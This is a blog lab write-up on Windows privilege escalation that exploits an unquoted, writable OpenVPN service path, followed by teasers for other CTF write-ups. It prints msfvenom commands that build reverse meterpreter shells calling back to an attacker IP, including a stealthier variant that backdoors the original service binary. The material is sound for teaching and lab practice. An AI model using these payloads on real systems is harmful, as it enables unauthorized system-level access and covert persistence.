Windows Privilege Escalation (Unquoted Service Paths)

 One way we can seek to elevate privileges in a Windows environment is to look for unquoted service paths which also contain blank spaces. These can potentially be exploited if we have a shell as a user who can modify directories where Windows will search for binaries.


To start this lab, I was given a bind shell to a Windows machine as a low privileged user.




Before running the exploit, I used set AutoRunScript migrate -f so the shell would migrate to a different process once it had been established. This is useful as it prevents the shell being disrupted by a user who closes the process it is running on.



As can be seen from the above screenshot, the initial shell was for a low level user. My mission was to elevate the privileges to system by finding and exploiting unquoted service paths.


I started by opening an interactive shell so that I could use a wmic command to search for unquoted service paths which also contained blank spaces wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """


This command found a service called OpenVPNService.



Next, I queried this service further using sc qc OpenVPNService and discovered that the service started as LocalSystem which was a good find!



Now, looking at the unquoted service path, we can see that because it contains blank spaces, Windows will search for the binary in a specific order. My job was to therefore find a directory somewhere along that search order in which I could modify files.


The search order would go like this:

C:\Program.exe

C:\Program Files\OpenVPN\bin\openvpnserv.exe


I first of all checked the \OpenVPN\bin directory using icacls and found that I did indeed have the ability to modify it (M) for els_user


icacls "C:\Program Files\OpenVPN\bin"



I next looked in the targeted directory to see if I could find the original binary.



I now needed to replace this original binary with a malicious binary which would open a reverse meterpreter shell when it was executed by the service OpenVPNSevice This malicious binary would need to be in the same directory and have the same name as the original one. I would also need to rename or remove the original binary. I renamed it as openvpnserv.exe.bak



I then used msfvenom to craft a reverse meterpreter shell with the name openvpnserv.exe before uploading it into the target directory on the victim machine using the original meterpreter shell. I could successfully upload my malicious binary because I could modify the contents of the directory. I used the following command to craft the reverse meterpreter shell: sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.50.50.100 LPORT=4460 --platform Windows -f exe > openvpnserv.exe




Now, when the OpenVPNService is restarted, it should execute my malicious binary instead of the original one. One problem with this is that the reverse shell would be opened but then it would immediately close because the original process would end. I first of all solved this problem by having the shell migrate to a different process by using set AutoRunScript explorer.exe followed by set AutoRunScript migrate -f





Next, with the handler already running as a background job, I went back into the original shell and tried to stop the service OpenVPNService so I could then restart it. This did not work sc stop OpenVPNService



I therefore rebooted the machine by using the reboot command from inside the meterpreter shell. This worked, though it was not exactly stealthy!


All I needed to then do was to wait for the service OpenVPNService to restart and execute my malicious binary as system!





I also learnt a more stealthy way to get this to work. Instead of renaming or deleting the original binary and replacing it with a malicious one, I tried crafting a reverse meterpreter shell using msfvenom, encoding it and then injecting it into the original binary. In this way, the original service would still work, but my reverse meterpreter shell would also be started. This meant that there was no need to migrate the process as the original service would still be running. This is more stealthy as the user will not notice that the service is not running. In order to do this, I first of all downloaded the original binary and then used sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.50.50.100 LPORT-4460 --platform Windows -f exe -e x86/shikata_ga_nai -i 15 -k -x openvpnserv.exe.bak > openvpnserv.exe



This way also worked!


Popular posts from this blog

Hacking Year of the Owl (thm)

Image
NOTE: I am currently migrating my writeups and cybersecurity notes to  my github This writeup can be found in a new and shiny form at puzz00 year of the owl writeup  --- The Year of the Owl is a machine by MuirlandOracle on tryhackme   We start by using nmap to scan the TCP ports. The results show us that this appears to be a windows machine because we see netbios on port 139, SMB on 445 and winrm on its default port of 5985. We take a closer look but don't find much of interest. Since SMB is running, we can try a null session attack, but this does not work. We cannot connect using rpcclient without valid creds, either. Web app enumeration does not reveal anything of interest, so I have not included it in this post. We need to find another way to enumerate usernames and potential passwords. We can try common UDP ports using nmap. The results come back in the open|filtered state which is not very useful. We do not know if the ports are open or if the UDP datagrams are bei...
Read more

Hacking Reset (thm)

Image
  NOTE: I am currently migrating my writeups and notes regarding hacking aka pentesting to  my github - my reset writeup can be found here     Reset is a fun active directory based box on thm   We start with an nmap scan which shows us that the target machine is probably a domain controller as it has port 88 open. Domain controllers typically have this port open since they are involved in kerberos based authentication. We also find some useful data regarding the domain and machine we are attacking. In addition, we find port 5985 is open - this is of interest as it is a port which is used by winrm which in turn is a service which could potentially give us a remote session on the target machine if we find valid credentials.    Since smb is being used, we start our enumeration of the haystack machine by taking a look at it - can we get a null session and thereby enumerate useful data? We find that we can. The IPC$ share has read access to non-authentica...
Read more

Simple CTF (tryhackme)

Image
  I started with a quick SYN scan of all ports on the target machine. The -T4 flag speeds up the scan from the default -T3 and the -p- flag specifies all ports to be scanned. As can be seen from the results, ports 21, 80 and 2222 had services listening on them. It was now time to take a closer look at those three ports, so I used the -A flag with nmap to find out more. The anonymous login allowed using FTP on port 21 seemed interesting, so I connected to it in passive mode using the username anonymous and no password ftp -p 10.10.179.144 The connection was successful, but I could not get any listing of the directories or files using ls so I turned my attention to port 80 by navigating to the home page in my browser. I was greeted with a default Apache "It Works!" page. I then checked the robots.txt file and fired up a directory buster. I used gobuster as it is fast, but dirb, dirbuster or a home-grown one would also do. The /simple directory stood out as interesting, so I na...
Read more